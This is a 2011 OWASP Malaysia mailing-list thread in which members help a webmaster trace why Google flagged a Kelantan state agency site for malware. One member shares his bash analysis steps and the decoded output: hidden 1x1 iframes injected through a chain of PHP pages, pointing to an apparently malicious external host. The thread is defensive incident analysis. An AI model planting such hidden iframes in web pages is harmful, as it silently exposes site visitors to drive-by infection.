Thanks Adnan On Wed, Feb 9, 2011 at 10:37 AM, Adnan bin Mohd Shukor < [email protected]> wrote:
> Hi, > > For further action :) > > http://25yearsofprogramming.com/blog/20070705.htm > > Thanks > > On 9 February 2011 10:36, Rasta Boy <[email protected]> wrote: > > Syamsuri, nice to hear that. Can you share your blog address. > > > > Adnan good work. Hope to learn more from you. > > > > On Wed, Feb 9, 2011 at 6:53 AM, Mohd Syamsuri <[email protected]> > wrote: > >> > >> Mr Adnan thanks for the info and guide.. > >> > >> I have clean all the mess and the site is up and running again.. > >> > >> thanks to all too.. > >> > >> ** I will blog this so others can make it as a guide... > >> > >> On Tue, Feb 8, 2011 at 6:00 PM, Adnan bin Mohd Shukor > >> <[email protected]> wrote: > >>> > >>> mamp <= LOL typo.. it should be nano > >>> js <= one of hte binary in Spidermonkey. get the patched version > >>> http://blog.didierstevens.com/programs/spidermonkey/ and if you are > >>> working on MacOS/Darwin, apply this patch > >>> > >>> > http://blog.xanda.org/2010/10/15/fix-for-spidermonkey-build-issue-in-darwin/ > >>> > >>> thanks > >>> > >>> On 8 February 2011 17:56, Sharuzzaman Ahmat Raslan > >>> <[email protected]> wrote: > >>> > I can see 2 interesting apps/scripts: > >>> > > >>> > 1. mamp > >>> > 2. /opt/analysis/js/js > >>> > > >>> > care to share? hopefully it is open source ;) > >>> > > >>> > > >>> > On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor > >>> > <[email protected]> wrote: > >>> >> > >>> >> Here is my bash history: > >>> >> > >>> >> xanda:tmp adnan$ history > >>> >> <snip> > >>> >> 500 cd /tmp > >>> >> 501 wget http:/www2.pkink.gov.my/indexsedc.php > >>> >> 502 wget http://www2.pkink.gov.my/indexsedc.php > >>> >> 503 nano indexsedc.php > >>> >> 504 wget http://www2.pkink.gov.my/indexsedc.php > >>> >> 505 mamp indexsedc.php.1 > >>> >> 506 nano indexsedc.php.1 > >>> >> 507 wget http://www2.pkink.gov.my/sedc.php > >>> >> 508 nano sedc.php > >>> >> 509 wget http://www2.pkink.gov.my/default.php > >>> >> 510 nano default.php > >>> >> 511 nano default.php > >>> >> 512 clear > >>> >> <I've remove tags and leave clean JavaScript inside> > >>> >> 513 mv default.php default.txt > >>> >> 514 /opt/analysis/js/js < default.txt > >>> >> 515 cat write.log > >>> >> 516 history > >>> >> xanda:tmp adnan$ > >>> >> > >>> >> Below is the output of the cat: > >>> >> [output] > >>> >> xanda:tmp adnan$ cat write.log > >>> >> <iframe width="1" height="1" > >>> >> > >>> >> > >>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== > "></iframe>"<iframe > >>> >> width="1" height="1" > >>> >> > >>> >> > >>> >> src="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== > "></iframe>" > >>> >> [/output] > >>> >> > >>> >> > >>> >> Hint: you might use modified version of spidermonkey to 'understand' > >>> >> the javascript > >>> >> > >>> >> Thanks > >>> >> > >>> >> On 8 February 2011 17:38, Mohd Syamsuri <[email protected]> > wrote: > >>> >> > thanks for the info.. > >>> >> > i will check all the file. > >>> >> > > >>> >> > how you found it? > >>> >> > > >>> >> > On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor > >>> >> > <[email protected]> wrote: > >>> >> >> > >>> >> >> Here is the flow: > >>> >> >> > >>> >> >> 1) your indexsedc.php has an iframe to sedc.php > >>> >> >> 2) and your sedc.php has an iframe to default.php > >>> >> >> 3) and in default.php (look at the last 2 lines), javascript will > >>> >> >> actually create an iframe to > >>> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== > >>> >> >> > >>> >> >> thanks :) > >>> >> >> > >>> >> >> On 8 February 2011 17:07, Mohd Syamsuri <[email protected]> > >>> >> >> wrote: > >>> >> >> > can you point... > >>> >> >> > my index.htm or indexsedc.php or other file? > >>> >> >> > > >>> >> >> > On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor > >>> >> >> > <[email protected]> wrote: > >>> >> >> >> > >>> >> >> >> you have iframe pointed to > >>> >> >> >> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA== > >>> >> >> >> > >>> >> >> >> which is not xss :) > >>> >> >> >> > >>> >> >> >> >From my personal point of view, its either caused by: > >>> >> >> >> 1) malware on pc which has been used for ftp/access to the > >>> >> >> >> server > >>> >> >> >> 2) compromised server > >>> >> >> >> > >>> >> >> >> you can send your access.log to [email protected] or > >>> >> >> >> [email protected] for further analysis :) > >>> >> >> >> > >>> >> >> >> thanks > >>> >> >> >> > >>> >> >> >> On 8 February 2011 16:00, Mohd Syamsuri <[email protected]> > >>> >> >> >> wrote: > >>> >> >> >> > I have check it. > >>> >> >> >> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy > >>> >> >> >> > <[email protected]> > >>> >> >> >> > wrote: > >>> >> >> >> >> > >>> >> >> >> >> Hi Mohd Symsuri, > >>> >> >> >> >> > >>> >> >> >> >> Why dont you check on the reason why its being blocked, it > >>> >> >> >> >> might > >>> >> >> >> >> help. > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/ > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788 > >>> >> >> >> >> > >>> >> >> >> >> Regards, > >>> >> >> >> >> Kishur > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri > >>> >> >> >> >> <[email protected]> > >>> >> >> >> >> wrote: > >>> >> >> >> >>> > >>> >> >> >> >>> Assalamualikum and Good day for my fellow friends. > >>> >> >> >> >>> I need some advise. > >>> >> >> >> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan > >>> >> >> >> >>> (http://www.pkink.gov.my) have been blocked by Google for > >>> >> >> >> >>> almost > >>> >> >> >> >>> 4 > >>> >> >> >> >>> days. > >>> >> >> >> >>> It said that we host malware on our server Malware > Detected! > >>> >> >> >> >>> ( > >>> >> >> >> >>> Google > >>> >> >> >> >>> said that!!) > >>> >> >> >> >>> What i did is.. > >>> >> >> >> >>> 1. Scan all the data and upload a new data > >>> >> >> >> >>> 2. Check the index.html or index.php > >>> >> >> >> >>> 3. Scan using web scanner using > >>> >> >> >> >>> http://www.avgthreatlabs.com/ > >>> >> >> >> >>> http://www.virustotal.com > >>> >> >> >> >>> but still get block.. > >>> >> >> >> >>> Googel said Suspected injected code > >>> >> >> >> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php"; > >>> >> >> >> >>> NAME="confcontent" > >>> >> >> >> >>> scrolling=yes > > >>> >> >> >> >>> I have using this code for almost 2 years > >>> >> >> >> >>> What should i do now? > >>> >> >> >> >>> > >>> >> >> >> >>> -- > >>> >> >> >> >>> best regard > >>> >> >> >> >>> syamsuri > >>> >> >> >> >>> > >>> >> >> >> >>> > >>> >> >> >> >>> > >>> >> >> >> >>> _______________________________________________ > >>> >> >> >> >>> Owasp-Malaysia mailing list > >>> >> >> >> >>> [email protected] > >>> >> >> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>> >> >> >> >>> > >>> >> >> >> >>> OWASP Malaysia Wiki > >>> >> >> >> >>> http://www.owasp.org/index.php/Malaysia > >>> >> >> >> >>> > >>> >> >> >> >>> OWASP Malaysia Wiki Facebook > >>> >> >> >> >>> > >>> >> >> >> >>> > >>> >> >> >> >>> > >>> >> >> >> >>> > >>> >> >> >> >>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> _______________________________________________ > >>> >> >> >> >> Owasp-Malaysia mailing list > >>> >> >> >> >> [email protected] > >>> >> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>> >> >> >> >> > >>> >> >> >> >> OWASP Malaysia Wiki > >>> >> >> >> >> http://www.owasp.org/index.php/Malaysia > >>> >> >> >> >> > >>> >> >> >> >> OWASP Malaysia Wiki Facebook > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > >>> >> >> >> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>> >> >> >> > > >>> >> >> >> > > >>> >> >> >> > > >>> >> >> >> > -- > >>> >> >> >> > best regard > >>> >> >> >> > syamsuri > >>> >> >> >> > > >>> >> >> >> > > >>> >> >> >> > > >>> >> >> >> > _______________________________________________ > >>> >> >> >> > Owasp-Malaysia mailing list > >>> >> >> >> > [email protected] > >>> >> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>> >> >> >> > > >>> >> >> >> > OWASP Malaysia Wiki > >>> >> >> >> > http://www.owasp.org/index.php/Malaysia > >>> >> >> >> > > >>> >> >> >> > OWASP Malaysia Wiki Facebook > >>> >> >> >> > > >>> >> >> >> > > >>> >> >> >> > > >>> >> >> >> > > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>> >> >> >> > > >>> >> >> >> _______________________________________________ > >>> >> >> >> Owasp-Malaysia mailing list > >>> >> >> >> [email protected] > >>> >> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>> >> >> >> > >>> >> >> >> OWASP Malaysia Wiki > >>> >> >> >> http://www.owasp.org/index.php/Malaysia > >>> >> >> >> > >>> >> >> >> OWASP Malaysia Wiki Facebook > >>> >> >> >> > >>> >> >> >> > >>> >> >> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>> >> >> > > >>> >> >> > > >>> >> >> > > >>> >> >> > -- > >>> >> >> > best regard > >>> >> >> > syamsuri > >>> >> >> > > >>> >> >> > > >>> >> >> > > >>> >> >> > _______________________________________________ > >>> >> >> > Owasp-Malaysia mailing list > >>> >> >> > [email protected] > >>> >> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>> >> >> > > >>> >> >> > OWASP Malaysia Wiki > >>> >> >> > http://www.owasp.org/index.php/Malaysia > >>> >> >> > > >>> >> >> > OWASP Malaysia Wiki Facebook > >>> >> >> > > >>> >> >> > > >>> >> >> > > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>> >> >> > > >>> >> >> _______________________________________________ > >>> >> >> Owasp-Malaysia mailing list > >>> >> >> [email protected] > >>> >> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>> >> >> > >>> >> >> OWASP Malaysia Wiki > >>> >> >> http://www.owasp.org/index.php/Malaysia > >>> >> >> > >>> >> >> OWASP Malaysia Wiki Facebook > >>> >> >> > >>> >> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>> >> > > >>> >> > > >>> >> > > >>> >> > -- > >>> >> > best regard > >>> >> > syamsuri > >>> >> > > >>> >> > > >>> >> > > >>> >> > _______________________________________________ > >>> >> > Owasp-Malaysia mailing list > >>> >> > [email protected] > >>> >> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>> >> > > >>> >> > OWASP Malaysia Wiki > >>> >> > http://www.owasp.org/index.php/Malaysia > >>> >> > > >>> >> > OWASP Malaysia Wiki Facebook > >>> >> > > >>> >> > > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>> >> > > >>> >> _______________________________________________ > >>> >> Owasp-Malaysia mailing list > >>> >> [email protected] > >>> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>> >> > >>> >> OWASP Malaysia Wiki > >>> >> http://www.owasp.org/index.php/Malaysia > >>> >> > >>> >> OWASP Malaysia Wiki Facebook > >>> >> > >>> >> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>> > > >>> > > >>> > > >>> > -- > >>> > Sharuzzaman Ahmat Raslan > >>> > > >>> > _______________________________________________ > >>> > Owasp-Malaysia mailing list > >>> > [email protected] > >>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>> > > >>> > OWASP Malaysia Wiki > >>> > http://www.owasp.org/index.php/Malaysia > >>> > > >>> > OWASP Malaysia Wiki Facebook > >>> > > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >>> > > >>> _______________________________________________ > >>> Owasp-Malaysia mailing list > >>> [email protected] > >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >>> > >>> OWASP Malaysia Wiki > >>> http://www.owasp.org/index.php/Malaysia > >>> > >>> OWASP Malaysia Wiki Facebook > >>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > >> > >> > >> > >> -- > >> best regard > >> syamsuri > >> > >> > >> > >> _______________________________________________ > >> Owasp-Malaysia mailing list > >> [email protected] > >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia > >> > >> OWASP Malaysia Wiki > >> http://www.owasp.org/index.php/Malaysia > >> > >> OWASP Malaysia Wiki Facebook > >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > > > > > > _______________________________________________ > > Owasp-Malaysia mailing list > > [email protected] > > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > > > OWASP Malaysia Wiki > > http://www.owasp.org/index.php/Malaysia > > > > OWASP Malaysia Wiki Facebook > > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 > > > _______________________________________________ > Owasp-Malaysia mailing list > [email protected] > https://lists.owasp.org/mailman/listinfo/owasp-malaysia > > OWASP Malaysia Wiki > http://www.owasp.org/index.php/Malaysia > > OWASP Malaysia Wiki Facebook > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420 >
_______________________________________________ Owasp-Malaysia mailing list [email protected] https://lists.owasp.org/mailman/listinfo/owasp-malaysia OWASP Malaysia Wiki http://www.owasp.org/index.php/Malaysia OWASP Malaysia Wiki Facebook http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
